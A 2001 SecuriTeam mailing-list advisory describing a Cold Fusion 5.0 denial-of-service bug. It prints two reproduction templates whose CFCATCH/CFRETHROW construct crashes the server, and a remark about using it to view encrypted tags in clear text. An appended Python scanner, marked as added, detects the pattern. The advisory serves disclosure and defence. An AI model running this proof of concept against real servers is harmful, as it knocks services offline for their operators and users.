[NT] Cold Fusion CFRETHROW Exploit

From: support@securiteam.com
Date: 07/31/01


From: support@securiteam.com
To: list@securiteam.com
Subject: [NT] Cold Fusion CFRETHROW Exploit
Message-Id: <20010731203628.85657138C2@mail.der-keiler.de>
Date: Tue, 31 Jul 2001 22:36:28 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  Cold Fusion CFRETHROW Exploit
------------------------------------------------------------------------

SUMMARY

A bug in Cold Fusion <http://www.macromedia.com/software/coldfusion/> allows
attackers who are able to create template files to crash the server. The
vulnerability allows a denial of service attack against the server.

DETAILS

Vulnerable systems:
Cold Fusion version 5.0

Immune systems:
Cold Fusion versions below 5.0

This vulnerability can be easily reproduced by using Cold Fusion 5 and two
Cold Fusion templates.

Create two files, file1.cfm and file2.cfm. Within file1.cfm put the
following code.

--------------------------
<CFTRY>
        <CFINCLUDE TEMPLATE="file2.cfm">
        <CFCATCH>
                <!--- Call encrypted tag or include template here --->
                <CFRETHROW>
        </CFCATCH>
</CFTRY>
--------------------------

Within file2.cfm put the following code.

--------------------------
<CFTHROW MESSAGE="TEST">
--------------------------

Call any custom tag or template that you want to see in clear text right
after the opening CFCATCH tag. Then request file1.cfm from a web browser
and the server should crash. It might take a couple of refreshes to make
the server crash.
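
On a Cold Fusion 5.0 server where several parties can place templates, the construct above can be located statically before it is ever requested. The following Python script is an added example, not part of the original advisory: it flags every CFRETHROW that sits inside a CFCATCH block and lists the includes and custom tags called earlier in that block. The sample template and the tag name CF_SECRET are constructed for illustration.

```python
import re
from pathlib import Path

# Tags that matter for the advisory's pattern. CFMODULE and cf_* custom tags
# are included because the text mentions calling a custom tag or template.
TAG_RE = re.compile(
    r"<(/?)(cftry|cfcatch|cfrethrow|cfinclude|cfmodule|cf_\w+)\b", re.I)
COMMENT_RE = re.compile(r"<!---.*?--->", re.S)

# Constructed sample: the file1.cfm layout with a hypothetical custom tag.
SAMPLE = """<CFTRY>
    <CFINCLUDE TEMPLATE="file2.cfm">
    <CFCATCH>
        <CF_SECRET>
        <CFRETHROW>
    </CFCATCH>
</CFTRY>
"""

def find_rethrow_pattern(source):
    """Return (line, calls) for each CFRETHROW inside a CFCATCH block; calls
    lists the includes and custom tags invoked earlier in that block."""
    # Blank out CFML comments, keeping newlines so line numbers stay correct.
    source = COMMENT_RE.sub(lambda m: re.sub(r"[^\n]", " ", m.group()), source)
    findings, stack = [], []  # stack holds open (tag, calls) blocks
    for m in TAG_RE.finditer(source):
        closing, name = m.group(1) == "/", m.group(2).lower()
        if name in ("cftry", "cfcatch"):
            if not closing:
                stack.append((name, []))
            elif any(tag == name for tag, _ in stack):
                while stack.pop()[0] != name:  # tolerate unbalanced markup
                    pass
        elif not closing and stack and stack[-1][0] == "cfcatch":
            if name == "cfrethrow":
                line = source.count("\n", 0, m.start()) + 1
                findings.append((line, list(stack[-1][1])))
            else:
                stack[-1][1].append(name)
    return findings

def scan_tree(root):
    """Yield (path, line, calls) for each .cfm/.cfml template under root."""
    for path in sorted(p for p in Path(root).rglob("*.cfm*") if p.is_file()):
        for line, calls in find_rethrow_pattern(path.read_text(errors="replace")):
            yield str(path), line, calls

if __name__ == "__main__":
    for line, calls in find_rethrow_pattern(SAMPLE):
        print(f"CFRETHROW at line {line}; earlier calls in CFCATCH: {calls}")
```

A hit is a template to review, not proof of abuse: CFRETHROW inside CFCATCH is also legitimate error-handling code.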

ADDITIONAL INFORMATION

The information has been provided by Eric Lackey <mailto:eric@isdn.net>.


DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


